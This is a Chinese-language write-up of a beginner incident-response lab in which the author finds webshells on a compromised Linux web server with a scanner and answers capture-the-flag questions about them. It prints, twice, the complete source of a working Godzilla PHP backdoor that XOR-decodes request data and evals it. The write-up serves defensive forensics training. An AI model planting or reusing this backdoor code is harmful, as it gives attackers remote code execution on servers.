玄机靶场–1.webshell查杀

我们先启动环境

image-20240601002751969

开启环境后会有IP地址

image-20240601002901773

账号密码就在概述里面

使用SSH链接靶机,然后查看开启的端口

image-20240601004014515

端口显示有80,22,3306,有web服务

然后查找目录,进入根目录用

1
find -name index.html

查找到在/var/www/html目录下

现在本地靶机进行河马webshell扫描

image-20240601004052963

image-20240601003408449

image-20240601004255642

然后发现扫描不到,只有一个一句话木马,无法进行外网访问,我们另起他法,将目录打包到本地

image-20240601005305799

然后在在线扫描再试试看(其实我本地杀软已经报毒了,但是还是在河马在线扫描进行了一次扫描)地址链接

一共扫描出5个结果

image-20240601005840023

1、黑客webshell里面的flag

一个疑似PHP命令执行webshell,一个是PHP命令执行webshell

image-20240601005922508

我们先打开这个比较确定的

image-20240601005937648

里面有一串注释就是webshell里面的flag了

image-20240601010113678

2、黑客使用的什么工具的shell github地址的md5

然后上面gz.php代码一眼望去—哥斯拉(具体请看别的大佬的webshell管理工具分析分析)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

将地址md5加密提交即可

image-20240601010826242

3、黑客隐藏shell的完整路径的md5 flag{md5}

然后还有一个隐藏shell的路径,Linux里文件前如果存在.即代表为隐藏文件,刚好扫描出来一个带.的php文件(.Mysqli.php)

我们打开它

image-20240601013427439

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

好了,隐藏的也找到了

image-20240601010803275

4、黑客免杀马完整路径 md5 flag{md5}

黑客免杀马完整路径

在上面河马扫描中一共有5个威胁,出去gz.php和.Mysqli.php,还剩下3个文件,我们先打开shell.php这个名字最像的

image-20240601013815067

发现就是普通的一句话木马,那我们找下一个 机器学习检测为webshell 这个比较重要的

image-20240601011507829

是一个比较简单的免杀,然后md5提交即可

image-20240601011539189

image-20240601011605586

总结

总的来说,题偏入门,适合练手和学习